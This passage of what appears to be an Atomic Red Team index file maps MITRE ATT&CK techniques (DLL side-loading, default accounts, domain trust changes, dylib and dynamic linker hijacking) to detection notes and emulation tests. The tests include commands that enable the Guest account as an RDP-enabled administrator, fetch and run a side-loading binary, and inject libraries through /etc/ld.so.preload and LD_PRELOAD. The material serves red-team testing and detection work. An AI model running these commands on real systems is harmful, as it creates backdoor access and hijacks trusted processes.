payload(s). 
+ + Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) + id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor processes for unusual activity (e.g., a process that + does not use the network begins to do so) as well as the introduction of new + files/programs. Track DLL metadata, such as a hash, and compare DLLs that + are loaded at process execution time against previous executions to detect + differences that do not correlate with patching or updates. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + x_mitre_platforms: + - Windows + identifier: T1574.002 + atomic_tests: + - name: DLL Side-Loading using the Notepad++ GUP.exe binary + auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 + description: | + GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. + Upon execution, calc.exe will be opened. 
+ supported_platforms: + - windows + input_arguments: + process_name: + description: Name of the created process + type: string + default: calculator.exe + gup_executable: + description: GUP is an open source signed binary used by Notepad++ for software + updates + type: path + default: PathToAtomicsFolder\T1574.002\bin\GUP.exe + dependency_executor_name: powershell + dependencies: + - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) + +' + prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" + executor: + command: "#{gup_executable}\n" + cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 + +' + name: command_prompt + T1078.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.001 + url: https://attack.mitre.org/techniques/T1078/001 + - external_id: CAPEC-70 + source_name: capec + url: https://capec.mitre.org/data/definitions/70.html + - source_name: Microsoft Local Accounts Feb 2019 + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts + description: Microsoft. (2018, December 9). Local Accounts. Retrieved February + 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. 
+ - source_name: Metasploit SSH Module + url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh + description: Metasploit. (n.d.). Retrieved April 12, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Default Accounts + description: |- + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) + + Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. 
Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) + id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T20:14:26.846Z' + created: '2020-03-13T20:15:31.974Z' + x_mitre_version: '1.2' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: Monitor whether default accounts have been activated or logged + into. These audits should also include checks on any appliances and applications + for default credentials or SSH keys, and if any are discovered, they should + be updated immediately. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + identifier: T1078.001 + atomic_tests: + - name: Enable Guest account with RDP capability and admin priviliges + auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + description: After execution the Default Guest account will be enabled (Active) + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections + supported_platforms: + - windows + input_arguments: + guest_user: + description: Specify the guest account + type: String + default: guest + guest_password: + description: Specify the guest password + type: String + default: Password123! 
+ executor: + command: |- + net user #{guest_user} /active:yes + net user #{guest_user} #{guest_password} + net localgroup administrators #{guest_user} /add + net localgroup "Remote Desktop Users" #{guest_user} /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f + cleanup_command: |- + net user #{guest_user} /active:no >nul 2>&1 + net localgroup administrators #{guest_user} /delete >nul 2>&1 + net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + name: command_prompt + elevation_required: true + T1078.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1078.002 + url: https://attack.mitre.org/techniques/T1078/002 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - source_name: Microsoft AD Accounts + url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts + description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved + March 13, 2020. + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. 
+ source_name: TechNet Audit Policy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Domain Accounts + description: |- + Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) + + Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. + id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2020-09-16T19:42:11.787Z' + created: '2020-03-13T20:21:54.758Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] + T1484: + technique: + id: attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d + description: |- + Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. + + With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. 
Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). + + Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators. + name: Domain Policy Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484 + url: https://attack.mitre.org/techniques/T1484 + - source_name: ADSecurity GPO Persistence 2016 + url: https://adsecurity.org/?p=2716 + description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence + #17: Group Policy. Retrieved March 5, 2019.' + - description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and + OUs. Retrieved March 5, 2019. + url: https://wald0.com/?p=179 + source_name: Wald0 Guide to GPOs + - source_name: Harmj0y Abusing GPO Permissions + url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ + description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved + March 5, 2019. + - source_name: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. 
(2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Microsoft 365 Defender Solorigate + url: https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ + description: Microsoft 365 Defender Team. (2020, December 28). Using Microsoft + 365 Defender to protect against Solorigate. Retrieved January 7, 2021. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:52:24.598Z' + created: '2019-03-07T14:10:32.650Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Deletion' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_version: '2.0' + x_mitre_detection: |- + It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate) + x_mitre_defense_bypassed: + - System access controls + - File system access controls + x_mitre_is_subtechnique: false + 
atomic_tests: [] + T1484.002: + technique: + id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee + description: |- + Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. + + Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. + name: Domain Trust Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1484.002 + url: https://attack.mitre.org/techniques/T1484/002 + - source_name: Microsoft - Azure AD Federation + url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed + description: Microsoft. (2018, November 28). What is federation with Azure + AD?. Retrieved December 30, 2020. + - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods + url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml + description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved + December 30, 2020. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. 
(2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. + - source_name: CISA SolarWinds Cloud Detection + url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a + description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity + in Microsoft Cloud Environments. Retrieved January 8, 2021. + - source_name: Microsoft - Update or Repair Federated domain + url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 + description: Microsoft. (2020, September 14). Update or repair the settings + of a federated domain in Office 365, Azure, or Intune. Retrieved December + 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-01-11T18:21:20.213Z' + created: '2020-12-28T21:59:02.181Z' + x_mitre_platforms: + - Windows + - Azure AD + x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender + x_mitre_detection: |- + Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection) + + Monitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: "Federated Domain Name", or Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain) + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + 
x_mitre_data_sources: + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Modification' + - 'Command: Command Execution' + atomic_tests: [] + T1574.004: + technique: + id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 + description: |- + Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added. + + Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. 
This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO) + name: Dylib Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.004 + url: https://attack.mitre.org/techniques/T1574/004 + - external_id: CAPEC-471 + source_name: capec + url: https://capec.mitre.org/data/definitions/471.html + - source_name: Wardle Dylib Hijack Vulnerable Apps + url: https://objective-see.com/blog/blog_0x46.html + description: Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore + Apps. Retrieved March 31, 2021. + - source_name: Wardle Dylib Hijacking OSX 2015 + url: https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf + description: Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved + March 29, 2021. + - source_name: Github EmpireProject HijackScanner + url: https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py + description: Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib + Hijack Vulnerability Scanner. Retrieved April 1, 2021. + - source_name: Github EmpireProject CreateHijacker Dylib + url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py + description: Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib + Hijacker. Retrieved April 1, 2021. + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. 
+ source_name: Writing Bad Malware for OSX + - source_name: wardle artofmalware volume1 + url: https://taomm.org/vol1/pdfs.html + description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume + 0x1: Analysis. Retrieved March 19, 2021.' + - source_name: MalwareUnicorn macOS Dylib Injection MachO + url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 + description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. + Retrieved March 29, 2021. + - source_name: Apple Developer Doco Archive Run-Path + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html + description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved + March 31, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T20:19:15.212Z' + created: '2020-03-16T15:23:30.896Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: "Monitor file systems for moving, renaming, replacing, or + modifying dylibs. Changes in the set of dylibs that are loaded by a process + (compared to past behavior) that do not correlate with known software, patches, + etc., are suspicious. Check the system for multiple dylibs with the same name + and monitor which versions have historically been loaded into a process. \n\nRun + path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, + and LC_RPATH. 
Other special keywords are recognized by the macOS + loader are @rpath, @loader_path, and @executable_path.(Citation: + Apple Developer Doco Archive Run-Path) These loader instructions can be examined + for individual binaries or frameworks using the otool -l command. + Objective-See's Dylib Hijacking Scanner can be used to identify applications + vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: + Github EmpireProject HijackScanner)" + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + x_mitre_defense_bypassed: + - Application control + atomic_tests: [] + T1574.006: + technique: + id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + description: "Adversaries may execute their own malicious payloads by hijacking + environment variables the dynamic linker uses to load shared libraries. During + the execution preparation phase of a program, the dynamic linker loads specified + absolute paths of shared libraries from environment variables and files, such + as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES + on macOS. Libraries specified in environment variables are loaded first, taking + precedence over system libraries with the same function name.(Citation: Man + LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic + Libraries) These variables are often used by developers to debug binaries + without needing to recompile, deconflict mapped symbols, and implement custom + functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn + Linux and macOS, hijacking dynamic linker variables may grant access to the + victim process's memory, system/network resources, and possibly elevated privileges. + This method may also evade detection from security products since the execution + is masked under a legitimate process. Adversaries can set environment variables + via the command line using the export command, setenv + function, or putenv function. 
Adversaries can also leverage [Dynamic + Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export + variables in a shell or set variables programmatically using higher level + syntax such Python’s os.environ.\n\nOn Linux, adversaries may + set LD_PRELOAD to point to malicious libraries that match the + name of legitimate libraries which are requested by a victim program, causing + the operating system to load the adversary's malicious code upon execution + of the victim program. LD_PRELOAD can be set via the environment + variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: + TLDP Shared Libraries) Libraries specified by LD_PRELOAD are + loaded and mapped into memory by dlopen() and mmap() + respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed + Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + \n\nOn macOS this behavior is conceptually the same as on Linux, differing + only in how the macOS dynamic libraries (dyld) is implemented at a lower level. 
+ Adversaries can set the DYLD_INSERT_LIBRARIES environment variable + to point to malicious libraries containing names of legitimate libraries or + functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: + Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina + Bypass) " + name: Dynamic Linker Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.006 + url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - source_name: Man LD.SO + url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html + description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved + June 15, 2020. + - source_name: TLDP Shared Libraries + url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html + description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved + January 31, 2020. + - source_name: Apple Doco Archive Dynamic Libraries + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html + description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved + March 24, 2021. + - source_name: Baeldung LD_PRELOAD + url: https://www.baeldung.com/linux/ld_preload-trick-what-is + description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved + March 24, 2021. + - source_name: Code Injection on Linux and macOS + url: https://www.datawire.io/code-injection-on-linux-and-macos/ + description: 'Itamar Turner-Trauring. (2017, April 18). 
“This will only hurt + for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved + December 20, 2017.' + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - url: http://phrack.org/issues/51/8.html + description: halflife. (1997, September 1). Shared Library Redirection Techniques. + Retrieved December 20, 2017. + source_name: Phrack halfdead 1997 + - source_name: Brown Exploiting Linkers + url: http://www.nth-dimension.org.uk/pub/BTL.pdf + description: 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the + linker. Retrieved March 29, 2021.' + - source_name: TheEvilBit DYLD_INSERT_LIBRARIES + url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ + description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection + in macOS / OSX. Retrieved March 26, 2020. + - source_name: Timac DYLD_INSERT_LIBRARIES + url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ + description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. + Retrieved March 26, 2020. + - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass + url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 + description: Jon Gabilondo. (2019, September 22). How to Inject Code into + Mach-O Apps. Part II.. Retrieved March 24, 2021. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:18.453Z' + created: '2020-03-13T20:09:59.569Z' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1574.006 + atomic_tests: + - name: Shared Library Injection via /etc/ld.so.preload + auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + description: "This test adds a shared library to the `ld.so.preload` list to + execute and intercept API calls. This technique was used by threat actor Rocke + during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon + successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. 
+ \n" + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' + +' + cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload + +' + name: bash + elevation_required: true + - name: Shared Library Injection via LD_PRELOAD + auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + description: | + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. + + Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. 
